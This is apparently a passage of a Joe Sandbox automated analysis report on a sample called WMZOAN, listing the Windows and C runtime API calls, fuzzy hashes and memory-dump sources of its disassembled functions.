                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressExitHandleModuleProcProcess
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 75539706-1276376045
                                            • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                            • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                            • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                            • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                            • Instruction ID: 44a8e325e4d6143c12ec05646d2046e237ed5b52870968507412a13ae90b644c
                                            • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                            • Instruction Fuzzy Hash: 36B19FA9F0A6C681EA67DE71D8C823D6690AF54B84F0D84B5DECC27795DE3CE4418B40
                                            APIs
                                            • GetStartupInfoA.KERNEL32 ref: 0000000140009F76
                                              • Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0
                                            • GetFileType.KERNEL32 ref: 000000014000A11C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: FileInfoSleepStartupType
                                            • String ID:
                                            • API String ID: 1527402494-0
                                            • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                            • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                            • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                            • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CommandLine$ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 3078728599-0
                                            • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                            • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                            • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                            • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7
                                              • Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A
                                            • GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
                                            • WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
                                            • WriteConsoleA.KERNEL32 ref: 000000014000FE32
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 1850339568-0
                                            • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                            • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                            • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                            • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                            • Instruction ID: fd00043dbdc0e26984848d2a621f25d64e936447e0f616837a9782a9aca02444
                                            • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                            • Instruction Fuzzy Hash: F91186FAF18B8B41F7561938EDAD37D11416F983B4F1C06B4E5EE362DA9E2C68414B01
                                            APIs
                                            • FlsGetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096A3
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096C2
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096EA
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096FB
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B0970C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                            • Instruction ID: 9a9512f9a42540bc6b862747460f43c28e09d573c58c3334cb0f0466792b34c7
                                            • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                            • Instruction Fuzzy Hash: 29115E98B0C2C245FA56AF35DD9917D21619F583F0F5C43B5E8FE266E6EE2CE4418300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                            • Instruction ID: a78ce57e1de5c6efd0b1d20659454b6ab182629667e4fe25375986bf42d9c7e8
                                            • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                            • Instruction Fuzzy Hash: 71110DD8A0D2C249F96AAF72DC9A17D21518F58370E1C07B5D8FE792E2EE2CB4418300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                            • Instruction ID: 608544a07c1e7e01f096f9bf6fffd21f97bd915f0b5be579cf2bc3c336a2214f
                                            • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                            • Instruction Fuzzy Hash: 5F9192B7A187858AE711CF74D8882AD77A0F744788F18417AEA8D27B65DF38D195C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                            • Instruction ID: 86539e3abcfa84b2ee789653d1c768732146caefa166c70540bad34cec738614
                                            • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                            • Instruction Fuzzy Hash: 3751907AB1D6828ADB158F39D88CA7C7391EB44B98F188171DA8E57788DF7DE841C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                            • Instruction ID: ce0ee3e96ed25f1bf347dc3f697a8b08adede76479ca64b5692b14bfa6c642ce
                                            • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                            • Instruction Fuzzy Hash: C7618D7690CBC585DA228F25E8843AEB7A0FB84784F084266EBDD17B59CF7CD190CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                            • Instruction ID: 964e739289b67f9ad0e8c80ef6b3c265c76e4a4139bd071a2c1e04cbb002d54e
                                            • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                            • Instruction Fuzzy Hash: 8A516BBA90C2C28AEB658F21D8C836C76A0EB54B84F1841B6DADD67B95CF3CF451C701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressHandleLoadModuleProc
                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                            • API String ID: 3055805555-3733552308
                                            • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                            • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                            • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                            • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Process$CurrentSizeWorking
                                            • String ID: Shrinking process size
                                            • API String ID: 2122760700-652428428
                                            • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                            • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                            • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                            • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Enter$Leave
                                            • String ID:
                                            • API String ID: 2801635615-0
                                            • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                            • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                            • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                            • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                            • Instruction ID: 7e3e2b15fd44f0ed2f5712776c9062711b1aeff23b529e8db41c070b699e9d9c
                                            • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                            • Instruction Fuzzy Hash: 8DD1C47AF18A8189E712CF75D8842EC37B1FB44B98B184276DE9D67B95DE38D406C340
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EE38
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EEC3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode
                                            • String ID:
                                            • API String ID: 953036326-0
                                            • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                            • Instruction ID: 038b2e624bf6f61932932c73940eff92ff04bab0843a94ed370339952cfbe303
                                            • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                            • Instruction Fuzzy Hash: 5691C6BEF28A9585F7528F75D8C827D6BA0AB44F88F184175DE8E76684DF38D441C700
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                            • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                            • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                            • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalEventSection$EnterLeaveReset
                                            • String ID:
                                            • API String ID: 3553466030-0
                                            • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                            • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                            • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                            • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalEventSection$EnterLeaveReset
                                            • String ID:
                                            • API String ID: 3553466030-0
                                            • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                            • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                            • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                            • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                            • Instruction ID: 1703987ebb6ae05a9e8a0046b5cdec7ec529aaae1155a173a9b0b0a63eb22af1
                                            • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                            • Instruction Fuzzy Hash: FF113A6AB14B418AEB00CF70EC583B833A4F719758F080E75DAAD967A4DF38D1588340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
